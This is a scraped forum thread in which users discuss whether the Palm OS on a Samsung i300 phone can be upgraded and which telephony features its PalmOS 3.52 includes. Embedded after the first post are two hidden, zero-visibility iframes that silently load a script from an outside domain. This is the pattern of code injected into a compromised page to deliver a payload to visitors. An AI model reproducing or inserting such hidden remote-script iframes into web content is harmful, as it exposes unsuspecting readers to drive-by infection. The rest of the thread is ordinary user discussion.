+ Reply to Thread

Possible to upgrade Palm OS on phone?

I am under the assumption that I cannot upgrade the Palm OS, given the integration between the software and the phone functions. Is that right? I've heard rumors that Samsung is working on an upgrade to be more in line with Palm OS 4.0. Anyone know anything?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You are correct. You can't use the standard palm upgrade.

As far as wheather Samsung is working on an upgrade or not, I don't know. I hope they are!

Administrator

Arrow

ive heard about this as well.. but 4.x aint really giving us any real benefits since we only have 8 bit color. i am more concerned that they fix these little "bugs" some of us have writtne elsewhere on this board...

K7AAY Treo 650/Cing & Nokia9300/TMo johnbartley's Avatar

OS upgrade not likely soon

Carrie Juchau, Samsung's left coast rep, said only a Samsung-written OS version would work and applying Palm's OS upgrade would be.... bad.

She knew of no plans for an OS upgrade at this time.

It's technically possible to patch, or completely replace, PalmOS3.52 in the i300 by using some of the i300's 8mb of RAM, but it's highly unlikely that they'll replace it wholesale (ask anyone with a Handspring Visor).

There IS one MAJOR potential gotcha with PalmOS3.52 vs PalmOS4.1 that's DIRECTLY relevant to the i300: the telephony-related functions of the PalmOS 4 New Feature Set. Basically everything telephony-related (from placing/receiving/monitoring voice/data calls to sending SMS messages) is part of it.

I haven't gotten a straight answer from anyone yet, but I've -heard- that the i300's PalmOS3.52 includes "all" of the telephony-related functions from the PalmOS 4 New Feature Set (Palm marketecture at work... they refused to permit anyone to release a 4.x palm before THEY did, but apparently let things that are invisible to consumers and end users (like the telephony-related stuff) slip down to 3.5x even though it's officially part of 4.x). There's a certain element of credibility to this, since Handspring is apparently going with 3.52 for the Treo as well. I can't believe ANYONE would go to the trouble of independently re-inventing the wheel just for the sake of staying with 3.5x...

On the other hand, if the i300 DOESN'T include the telephony-related functions from the 4.0 New Feature Set, I'll be the first to be screaming "foul"... but for the time being (at least until this weekend, when I have more time to probe my i300 a bit), I'm assuming they're there.

PamlOS 4.1????

Is anybody working on this for the I300? or is samsung planning on offering it? I have 'notepad' envy, and it only works with 4.0 or above........

and the 'clock' is pretty cool too..

Don't count on it.

Administrator

Arrow

this phone is stuck with 3.5.2. they (samsung) are through with this phone (as fas as they are cocerned) and are working on the 1330 and its release.. whenevr that will be...